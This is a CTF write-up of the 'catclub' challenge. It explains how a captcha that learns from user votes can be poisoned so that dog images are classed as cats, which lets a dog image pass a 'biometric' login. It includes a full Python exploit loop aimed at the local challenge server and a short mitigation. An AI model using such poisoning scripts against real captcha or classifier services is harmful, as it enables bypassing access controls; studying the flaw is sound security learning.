CInsects CTF 2022 - catclub

Trick Captcha to believe a dog is actually a cat and let it into the catclub

The challenge catclub is written in Python and offers the service shadymail that can be accessed after an image captcha is solved and the hidden catclub page where various pictures of random cats can be seen.

Service Overview

  • The home page which consists of a captcha where all images of an specific animal must be selected to proceed.(/)
  • The shadymail service which can be accessed after completing a captcha (/shadymail/home)
  • The catclub page where random cat images from the internet are displayed (/catclub/images)
  • A login page where there is a login form and an image upload that acts as a login if one uploads a dog image that is classified by the captcha algorithm as a cat (biometric check) (/catclub/login)
  • The flag page where people who passed the fake cat login get to leave a message (/catclub/login ; logged in as dog)

Vulnerability

The goal is to access the page where people can leave comments (flag page). To access this page one has to pass the biometric check as a dog that is classified as a cat.

This is usually impossible because only cats get classified as cats. The vulnerability in this service lies in the fact that the captcha learns which images are cats from user input.

Code excerpt from the captcha service:

# Check if the accuracy is high enough
    if accuracy > ACCURACY_TRESH: #passes captcha
        # Save class votes in user votes
        for image in session["images"]:
            if image in data["clicked_images"]:
                value = 1
            else:
                value = -1
            # Get previous user voting if it exists
            previous_value = int(db.hgetall(f'uservote:{image}').get(goal_class, 0))
            # Write new value to db
            db.hset(f'uservote:{image}', goal_class, previous_value + value)#save all selected images

The problem with this algorithm is that it isn't exact and uses a accuracy threshold to determine if a captcha is solved or not. With this mechanic we can call the captcha service over and over again, select all cat images and select a few dog images so that the captcha still passes but dogs get marked as cats.

Exploit

As the base of the exploit I used the preparedata.py file from the source of the service that loads all images of animals and their true label classification.

I then use this ground truth and comapare it with the images I get from the "/" endpoint (captcha). I select all cats and a few dogs so that I can still pass the accuracy threshold and send the try to "/captchaaas/validate". After a few hundred iterations I get enough dogs smuggled in as cats and can then use these misclassified dogs to circumvent the biometric verification check on "/catclub/login".

After that I can just use a dog to login on "/catclub/login", where the page detects that I am a dog that got classified as a cat and displays all messages left from people who got here first (including flags).

import string
import pickle
import random
import requests
import matplotlib.pyplot as plt
from PIL import Image
from io import BytesIO
from urllib.parse import quote
from base64 import b64encode
from bs4 import BeautifulSoup

#Load image data and labels
def unpickle(file):
    with open(file, 'rb') as fo:
        dict = pickle.load(fo, encoding='latin1')
    return dict

data_batch_1 = unpickle("data_batch_1")
meta = unpickle("batches.meta")

labels = data_batch_1['labels']
images = data_batch_1['data']

print(f"Avalible classes: {meta['label_names']}")

classes = ["bird", "cat", "deer", "dog", "frog", "horse"]

print(f"Selected classes: {classes}")
print(f"Unavaliblbe classes: {list(set(classes) - set(meta['label_names']))}")

used_class_indices = [meta['label_names'].index(class_name) for class_name in classes]

pickle_contents = {}
pickle_images = {}
for idx, image in enumerate(images):
    label = labels[idx]
    if label in used_class_indices:
        image = image.reshape(3,32,32).transpose(1,2,0)
        image = Image.fromarray(image)
        byte_io = BytesIO()
        image.save(byte_io, 'png')
        data = quote(b64encode(byte_io.getvalue()).decode('ascii'))
        image_name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
        pickle_contents[data]= meta['label_names'][label]
        pickle_images[data] = image


used_dogs = []

#call captcha service over and over again, select all cats 
for i in range(500):
    id = ""
    while True:
        r = requests.get('http://localhost')
        soup = BeautifulSoup(r.text, 'html.parser')
        id = soup.find_all("div", {"class": "captcha_image_card"})[0].get("id")
        # only smuggle dogs in cptchas where cats must be selected
        if str(soup.find_all('b')[0])=="<b>cat!</b>":
            break

    print(i)
    cats = []
    dogs = []
    for img in soup.find_all('img'):
        if pickle_contents[img.get('src')[23:]]:
            if pickle_contents[img.get('src')[23:]] == "cat":
                cats.append(img.get("id"))
            if pickle_contents[img.get('src')[23:]] == "dog":
                dogs.append(img.get("id"))
                #Save dogs
                pickle_images[img.get('src')[23:]].save("chosen/dogs-"+img.get("id")+".png", 'png')

    stats = [[x,used_dogs.count(x)] for x in set(used_dogs)]

    ids_l1 = set(x[0] for x in stats)  # All ids in list 1
    intersection = [item for item in stats if item[0] in dogs]  # Only those elements of l2 with an id in l1
    intersection.sort(key=lambda tup: tup[1],reverse=True)
    #select dogs with the most hits
    if len(intersection)==0:
        sel_dogs=dogs[0:3]
    elif len(intersection) <3:
        diff = 3-len(intersection)
        sel_dogs = [item[0] for item in intersection]+ [item[0] for item in dogs if item not in [dog for dog in dogs]][0:diff]
    else:
        sel_dogs = [item[0] for item in intersection[0:3]]


    myobj = {'clicked_images': cats+sel_dogs,"id":id}
    used_dogs = used_dogs+sel_dogs
    # send the captcha with the smuggled dogs to the captcha endpoint
    x = requests.post("http://localhost/captchaaas/validate", json = myobj)

# output dogs which are classified the most as cats
stats = [[x,used_dogs.count(x)] for x in set(used_dogs)]
stats.sort(key=lambda tup: tup[1], reverse=True)
print(stats[0:10])

Possible mitigation

Disable the learning feature and just use the label database for verification of captchas instead.


Navigation